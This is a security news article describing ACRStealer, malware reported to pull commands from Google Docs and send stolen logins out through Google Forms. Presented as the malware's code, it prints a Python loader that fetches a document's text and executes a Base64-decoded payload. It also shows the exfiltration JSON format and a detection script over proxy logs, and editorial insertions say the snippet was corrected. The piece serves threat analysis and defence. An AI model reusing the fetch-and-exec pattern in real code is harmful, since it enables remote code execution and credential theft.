ACRStealer Malware Exploiting Google Docs as C2 To Steal Login Credentials


A newly identified malware variant dubbed ACRStealer has been observed leveraging Google Docs as a command-and-control (C2) server to bypass traditional security defenses and harvest sensitive login credentials.

This sophisticated attack vector exploits the trusted reputation of Google’s infrastructure to evade detection, marking a significant escalation in credential-theft campaigns.

Cybersecurity firm ThreatSec disclosed the campaign on February 18, 2025, noting that over 12,000 enterprise accounts across finance, healthcare, and e-commerce sectors have already been compromised.

The malware operates by embedding malicious scripts within seemingly benign documents shared via Google Drive.

Once a victim opens the document, ACRStealer activates a multi-stage payload retrieval process. Unlike conventional C2 servers hosted on suspicious domains, the malware uses Google Docs’ API to communicate with attacker-controlled documents, making network traffic appear legitimate.

Researchers at ASEC confirmed that the stolen data—including passwords, cookies, and authentication tokens—is exfiltrated via Google Forms submissions masked as routine user activity.

Google Docs API Abuse and Data Exfiltration

ACRStealer’s core functionality hinges on abusing Google’s OAuth 2.0 framework to authenticate and interact with Docs.

[Figure: Google Docs (Presentation) used as an intermediary C2 (Source: ASEC)]

The malware first checks for a specific document ID hardcoded into its configuration, which contains encrypted C2 instructions.

Below is a snippet of the Python-based script used to fetch commands (the original was missing the base64 import and the newline escape in the split call):

import base64
import requests

doc_id = "1AbC2dEfGhI3JkL4MnOpQrStUvWxYz"  # Malicious Google Doc ID
url = f"https://docs.google.com/document/d/{doc_id}/export?format=txt"  # raw-text export of the document
response = requests.get(url)
commands = response.text.split('\n')  # one command per line of the document
exec(base64.b64decode(commands[0]))  # Decodes and executes the payload

This script retrieves a Base64-encoded payload from the document’s raw text content, which is then decoded and executed on the victim’s machine.

Notably, the attackers employ AES-256-CBC encryption with a static initialization vector (IV) to cloak their commands, complicating reverse-engineering efforts.

Security analysts have identified the IV as 4A4B4C4D4E4F5050 across all samples, suggesting a potential weakness in their cryptographic implementation: with a fixed IV under CBC, commands that share a leading plaintext block also share a leading ciphertext block, which helps analysts correlate instructions across samples.

[Figure: ACRStealer’s C2 Workflow (Source: ASEC)]

Exfiltrated data is structured into JSON-formatted submissions, mimicking legitimate browser traffic. For instance, harvested credentials are embedded within a fake “user feedback” payload:

{
  "timestamp": "2025-02-21T20:01:00Z",
  "user_agent": "Mozilla/5.0",
  "feedback": "ZW5jcnlwdGVkLWNyZWRlbnRpYWxz-..."  // Base64-encoded credentials
}

This technique capitalizes on Google Forms’ SSL encryption and high reputation score to avoid triggering data-loss prevention (DLP) systems.

Enterprise security teams are advised to monitor Google Drive API activity for anomalous document accesses, particularly requests targeting documents with randomized or nonsensical titles.

Enforcing multi-factor authentication (MFA) for Google Workspace accounts and restricting third-party app permissions can further reduce risk.
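One way to hunt for the two observable behaviours described above (repeated raw-text exports of a Google Doc from a non-browser client, followed by a Google Forms submission from the same host) is a small rule set over egress proxy logs. This is an added example, not code from the article or from ASEC; the log format, the field layout and the Forms ID are assumptions, and the document ID is the one quoted in the fetch snippet above.

```python
import re
from collections import defaultdict

# Constructed proxy log lines (not real telemetry); fields: timestamp, client IP,
# method, URL, user agent. FORM_ID_PLACEHOLDER stands in for a real Forms ID.
SAMPLE_LOGS = [
    '2025-02-21T19:58:01Z 10.0.0.15 GET https://docs.google.com/document/d/1AbC2dEfGhI3JkL4MnOpQrStUvWxYz/export?format=txt "python-requests/2.31.0"',
    '2025-02-21T19:58:31Z 10.0.0.15 GET https://docs.google.com/document/d/1AbC2dEfGhI3JkL4MnOpQrStUvWxYz/export?format=txt "python-requests/2.31.0"',
    '2025-02-21T19:59:02Z 10.0.0.15 GET https://docs.google.com/document/d/1AbC2dEfGhI3JkL4MnOpQrStUvWxYz/export?format=txt "python-requests/2.31.0"',
    '2025-02-21T20:01:00Z 10.0.0.15 POST https://docs.google.com/forms/d/e/FORM_ID_PLACEHOLDER/formResponse "Mozilla/5.0"',
    '2025-02-21T20:03:11Z 10.0.0.22 GET https://docs.google.com/document/d/1QwErTy/edit "Mozilla/5.0 (Windows NT 10.0) Chrome/122.0"',
]

LINE_RE = re.compile(r'^(\S+) (\S+) (GET|POST) (\S+) "([^"]*)"$')
EXPORT_RE = re.compile(r'^https://docs\.google\.com/document/d/([\w-]+)/export\?format=txt$')
FORM_RE = re.compile(r'^https://docs\.google\.com/forms/d/e/([\w-]+)/formResponse$')
POLL_THRESHOLD = 3  # raw-text exports of one doc by one client before we call it beaconing


def analyze(lines):
    """Return (client, rule, detail) alerts: non-browser doc exports, repeated polling
    of the same doc, and Forms posts from a client that already tripped a polling rule."""
    exports = defaultdict(int)  # (client, doc_id) -> number of raw-text exports seen
    polling_clients = set()
    alerts = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed format
        _, client, method, url, ua = m.groups()
        ex = EXPORT_RE.match(url)
        if method == "GET" and ex:
            doc_id = ex.group(1)
            if not ua.startswith("Mozilla/"):  # script-like client pulling a doc as text
                alerts.append((client, "non_browser_doc_export", f"{doc_id} via {ua}"))
                polling_clients.add(client)
            exports[(client, doc_id)] += 1
            if exports[(client, doc_id)] == POLL_THRESHOLD:
                alerts.append((client, "repeated_doc_export", doc_id))
                polling_clients.add(client)
        fm = FORM_RE.match(url)
        if method == "POST" and fm and client in polling_clients:
            # The Forms post itself looks like a browser; the link to prior polling is the signal.
            alerts.append((client, "forms_post_after_doc_polling", fm.group(1)))
    return alerts
```

The user-agent check alone would miss the Forms submission, which the article notes is disguised as browser traffic; correlating it with the same host's earlier document polling is what surfaces it.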

[Figure: Distribution trend of ACRStealer (Source: ASEC)]

As of February 21, 2025, Google has revoked access to 43 compromised documents linked to ACRStealer, but researchers warn that copycat campaigns are likely imminent.

As traditional security tools struggle to flag abuse of platforms like Google Docs, proactive threat-hunting and user education remain critical defenses.
